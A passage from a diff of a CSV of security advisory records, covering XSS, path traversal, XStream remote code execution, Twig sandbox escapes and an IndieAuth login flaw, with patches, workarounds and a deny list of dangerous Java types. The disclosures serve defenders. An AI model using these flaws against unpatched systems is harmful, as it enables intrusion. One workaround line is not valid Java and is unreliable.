'https://access.redhat.com/errata/RHSA-2020:0601'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0605'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0606'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0804'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0805'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0806'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0811'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4532-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-20T20:54:25Z', 'nvd_published_at': '2020-01-29T21:15:00Z'}"
+1.4.0,GHSA-r5fx-8r73-v86c,2022-08-02T16:22:26Z,2020-02-14T23:08:49Z,,['CVE-2019-14863'],AngularJS Cross-site Scripting due to failure to sanitize `xlink.href` attributes,"Versions of `angular` prior to 1.5.0-beta.1 are vulnerable to Cross-Site Scripting. The package fails to sanitize `xlink:href` attributes, which may allow attackers to execute arbitrary JavaScript in a victim's browser if the value is user-controlled.
+
+
+## Recommendation
+
+Upgrade to version 1.5.0-beta.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'angular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0-beta.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14863'}, {'type': 'WEB', 'url': 'https://github.com/angular/angular.js/pull/12524'}, {'type': 'WEB', 'url': 'https://github.com/angular/angular.js/commit/35a21532b73d5bd84b4325211c563e6a3e2dde82'}, {'type': 'WEB', 'url': 'https://github.com/angular/angular.js/commit/f33ce173c90736e349cf594df717ae3ee41e0f7a'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14863'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/angular.js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:angular:20150807'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1453'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-13T17:26:17Z', 'nvd_published_at': '2020-01-02T15:15:00Z'}"
+1.4.0,GHSA-x8wj-6m73-gfqp,2021-01-08T20:30:34Z,2020-02-18T18:59:24Z,,['CVE-2020-5237'],Relative Path Traversal (CWE-23) in chunked uploads in oneup/uploader-bundle,"### Impact
+The vulnerability was identified in the web service for a chunked file
+upload. While the names of the POST parameters vary with the used
+frontend, their values are always used in the same way to build a path
+where the chunks are stored and assembled temporarily. By not validating
+these parameters properly, OneupUploaderBundle is susceptible to a path
+traversal vulnerability which can be exploited to upload files to
+arbitrary folders on the filesystem. The assembly process can further be
+misused with some restrictions to delete and copy files to other
+locations.
+
+The vulnerability can be exploited by any users that have legitimate
+access to the upload functionality and can lead to arbitrary code
+execution, denial of service and disclosure of confidential information.
+
+### Patches
+Yes, see version 1.9.3 and 2.1.5.
+
+### References
+https://owasp.org/www-community/attacks/Path_Traversal
+
+### Credits:
+This security vulnerability was found by Thibaud Kehler of SySS GmbH.
+E-Mail: thibaud.kehler@syss.de","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'oneup/uploader-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'oneup/uploader-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5237'}, {'type': 'WEB', 'url': 'https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c'}, {'type': 'WEB', 'url': 'https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt'}]","{'cwe_ids': ['CWE-22', 'CWE-23'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-05T13:52:02Z', 'nvd_published_at': '2020-02-05T14:15:00Z'}"
+1.4.0,GHSA-mw36-7c6c-q4q2,2022-02-08T22:03:00Z,2020-11-16T20:07:59Z,,['CVE-2020-26217'],XStream can be used for Remote Code Execution,"### Impact
+The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.14.
+
+### Workarounds
+No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.
+
+Users of XStream 1.4.13 or below who still want to use XStream default blacklist can use a workaround depending on their version in use.
+
+Users of XStream 1.4.13 can simply add two lines to XStream's setup code:
+```Java
+xstream.denyTypes(new String[]{ ""javax.imageio.ImageIO$ContainsFilter"" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
+```
+Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _java.lang.Void_ and _void_.
+```Java
+xstream.denyTypes(new String[]{ ""javax.imageio.ImageIO$ContainsFilter"" });
+xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
+```
+Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:
+```Java
+xstream.registerConverter(new Converter() {
+ public boolean canConvert(Class type) {
+ return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals(""javax.imageio.ImageIO$ContainsFilter"") || Proxy.isProxy(type));
+ }
+
+ public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+ throw new ConversionException(""Unsupported type due to security reasons."");
+ }
+
+ public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+ throw new ConversionException(""Unsupported type due to security reasons."");
+ }
+}, XStream.PRIORITY_LOW);
+```
+
+### Credits
+Chen L found and reported the issue to XStream and provided the required information to reproduce it. He was supported by Zhihong Tian and Hui Lu, both from Guangzhou University.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2020-26217](https://x-stream.github.io/CVE-2020-26217.html).
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.14-jdk7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.13'}}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26217'}, {'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7c9fc255edc0b9cd9567093d131f6d33fde4c662aaf912460ef630e9@%3Ccommits.camel.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r826a006fda71cc96fc87b6eca4b5d195f19a292ad36cea501682c38c@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/redde3609b89b2a4ff18b536a06ef9a77deb93d47fda8ed28086fa8c3@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/12/msg00001.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210409-0004/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4811'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2020-26217.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-11-16T20:06:06Z', 'nvd_published_at': '2020-11-16T21:15:00Z'}"
+1.4.0,GHSA-hpjm-3ww5-6cpf,2021-01-07T22:41:42Z,2020-11-18T21:06:07Z,,['CVE-2020-26216'],Cross-Site Scripting through Fluid view helper arguments,"> ### Meta
+> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (5.7)
+> * CWE-79
+
+### Problem
+
+Three XSS vulnerabilities have been detected in Fluid:
+
+1. TagBasedViewHelper allowed XSS throug maliciously crafted `additionalAttributes` arrays by creating keys with attribute-closing quotes followed by HTML. When rendering such attributes, TagBuilder would not escape the keys.
+2. ViewHelpers which used the `CompileWithContentArgumentAndRenderStatic` trait, and which declared `escapeOutput = false`, would receive the content argument in unescaped format.
+3. Subclasses of AbstractConditionViewHelper would receive the `then` and `else` arguments in unescaped format.
+
+### Solution
+Update to versions 2.0.8, 2.1.7, 2.2.4, 2.3.7, 2.4.4, 2.5.11 or 2.6.10 of this `typo3fluid/fluid` package that fix the problem described.
+
+Updated versions of this package are bundled in following TYPO3 (`typo3/cms-core`) releases:
+
+* TYPO3 v9.5.23 (using typo3fluid/fluid v2.6.10)
+* TYPO3 v10.4.10 (using typo3fluid/fluid v2.6.10)
+
+The specific vulnerabilities are prevented by:
+
+1. Explicitly escaping keys found in the `additionalAttributes` array passed to a TagBasedViewHelper before using them as attribute names.
+2. Detecting ""content argument"" on ViewHelpers using the trait CompileWithContentArgumentAndRenderStatic and escaping it based on the state of `escapeChildren` when `escapeOutput` is toggled off. Escaping still will not occur if explicitly disabled by an enclosing ViewHelper. This homogenises escaping behavior of ""content arguments"" so the same strategy is used whether the ""content"" argument is passed as argument or child content.
+3. Explicitly defining the `then` and `else` arguments on AbstractConditionViewHelper subclasses as escaped and applying escaping in all cases where escaping is not explicitly disabled by an enclosing ViewHelper.
+
+
+### Affected cases
+
+1. The fix for TagBasedViewHelper does not affect any valid use cases; it only prevents use of maliciously crafted attribute/value arrays passed as `additionalAttributes`.
+2. Any case where a ViewHelper with a ""content argument"" and which defines `escapeOutput = false` is used with the content argument instead of passing variables as child node - e.g. ` ` instead of `{variable} ` to intentionally circumvent escaping of any HTML in `{variable}`.
+3. Any case where a condition ViewHelper is used with `then` or `else` arguments to render a variable containing HTML, excluding cases where the variable is intentionally unescaped - e.g. ` f:format.raw()}"" />`, and excluding any cases where a ViewHelper is used as argument value and the ViewHelper intentionally disables escaping - e.g. ` ` does not escape the `then` argument because `f:render` disables output escaping.
+
+Cases 2 and 3 can be mitigated to allow variables with HTML to not be escaped, by intentionally disabling escaping by chaining the variable used in the argument with `f:format.raw` as described in case 3. Note that this constitutes a potential security issue, for which the template author is solely responsible. Example: ` ` can allow HTML in `{intentionalHtmlVariable}` by adding `-> f:format.raw()` - to become ` f:format.raw()}"" />`.
+
+Custom ViewHelpers which use `CompileWithContentArgumentAndRenderStatic` can alternatively pass a 6th argument with value `false` to the call to `registerArgument` which registers the ""content argument"", which explicitly disables escaping of the argument value: `$this->registerArgument('arg', 'string', 'My argument', false, null, false);`. Note that this constitutes a potential security issue for which the ViewHelper author is solely responsible. **Variables containing HTML should only be allowed after taking great care to prevent XSS through other means, e.g. sanitising the variable before it is assigned to Fluid or only allowing such variables to come from trusted sources.**
+
+### Credits
+Thanks to Jonas Eberle and Sinan Sekerci (Dreamlab Technologies) who reported this issue and to TYPO3 core merger Claus Due who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2020-009](https://typo3.org/security/advisory/typo3-core-sa-2020-009)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.11'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3fluid/fluid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/Fluid/security/advisories/GHSA-hpjm-3ww5-6cpf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26216'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/Fluid/commit/f20db4e74cf9803c6cffca2ed2f03e1b0b89d0dc'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-009'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-17T20:30:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-94vp-rmqv-5875,2021-11-19T13:42:37Z,2020-11-23T19:48:27Z,,['CVE-2020-15247'],Twig Sandbox Escape by authenticated users with access to editing CMS templates when safemode is enabled.,"### Impact
+An authenticated backend user with the `cms.manage_pages`, `cms.manage_layouts`, or `cms.manage_partials` permissions who would **normally** not be permitted to provide PHP code to be executed by the CMS due to `cms.enableSafeMode` being enabled is able to write specific Twig code to escape the Twig sandbox and execute arbitrary PHP.
+
+This is not a problem for anyone that trusts their users with those permissions to normally write & manage PHP within the CMS by not having `cms.enableSafeMode` enabled, but would be a problem for anyone relying on `cms.enableSafeMode` to ensure that users with those permissions in production do not have access to write & execute arbitrary PHP.
+
+### Patches
+Issue has been patched in Build 469 (v1.0.469) and v1.1.0.
+
+### Workarounds
+Apply https://github.com/octobercms/october/compare/106daa2930de4cebb18732732d47d4056f01dd5b...7cb148c1677373ac30ccfd3069d18098e403e1ca to your installation manually if unable to upgrade to Build 469.
+
+### References
+Reported by [ka1n4t](https://github.com/ka1n4t)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.319'}, {'fixed': '1.0.469'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-94vp-rmqv-5875'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15247'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/4c650bb775ab849e48202a4923bac93bd74f9982'}, {'type': 'PACKAGE', 'url': 'https://github.com/octobercms/october'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T19:33:21Z', 'nvd_published_at': '2020-11-23T20:15:00Z'}"
+1.4.0,GHSA-r89v-cgv7-3jhx,2021-03-04T18:24:40Z,2020-11-23T20:54:18Z,,['CVE-2020-26231'],"Bypass of fix for CVE-2020-15247, Twig sandbox escape","### Impact
+A bypass of CVE-2020-15247 (fixed in 1.0.469 and 1.1.0) was discovered that has the same impact as CVE-2020-15247:
+
+An authenticated backend user with the `cms.manage_pages`, `cms.manage_layouts`, or `cms.manage_partials` permissions who would **normally** not be permitted to provide PHP code to be executed by the CMS due to `cms.enableSafeMode` being enabled is able to write specific Twig code to escape the Twig sandbox and execute arbitrary PHP.
+
+This is not a problem for anyone that trusts their users with those permissions to normally write & manage PHP within the CMS by not having `cms.enableSafeMode` enabled, but would be a problem for anyone relying on `cms.enableSafeMode` to ensure that users with those permissions in production do not have access to write & execute arbitrary PHP.
+
+### Patches
+Issue has been patched in Build 470 (v1.0.470) and v1.1.1.
+
+### Workarounds
+Apply https://github.com/octobercms/october/commit/d34fb8ab51108495a9a651b841202d935f4e12f7 to your installation manually if unable to upgrade to Build 470 or v1.1.1.
+
+### References
+Reported by [ka1n4t](https://github.com/ka1n4t)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)
+
+### Threat assessment:
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'october/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.469'}, {'fixed': '1.0.470'}]}], 'versions': ['1.0.469']}]","[{'type': 'WEB', 'url': 'https://github.com/octobercms/october/security/advisories/GHSA-r89v-cgv7-3jhx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26231'}, {'type': 'WEB', 'url': 'https://github.com/octobercms/october/commit/d34fb8ab51108495a9a651b841202d935f4e12f7'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-94vp-rmqv-5875'}]","{'cwe_ids': ['CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-23T20:53:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-28fw-88hq-6jmm,2020-11-13T18:25:26Z,2020-11-13T18:26:03Z,,[],Persistent XSS in shopping worlds,"### Impact
+Persistent XSS in shopping worlds
+
+### Patches
+
+We recommend updating to the current version 5.6.9. You can get the update to 5.6.9 regularly via the Auto-Updater or directly via the download overview.
+
+For older versions you can use the Security Plugin:
+https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
+
+### References
+https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-11-2020",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-28fw-88hq-6jmm'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-11-13T18:25:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mjcr-rqjg-rhg3,2022-03-21T20:04:49Z,2020-11-24T21:21:04Z,,[],"Implementation trusts the ""me"" field returned by the authorization server without verifying it","### Impact
+
+A malicious user can sign in as a user with any IndieAuth identifier. This is because the implementation does not verify that the final `""me""` URL value returned by the authorization server belongs to the same domain as the initial value entered by the user.
+
+### Patches
+
+Version 1.1 fixes this issue.
+
+### Workarounds
+
+There is no workaround. Upgrade to 1.1 immediately.
+
+### References
+
+- [Security Considerations: Differing User Profile URLs](https://indieauth.spec.indieweb.org/#differing-user-profile-urls-li-1) in the IndieAuth specification.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
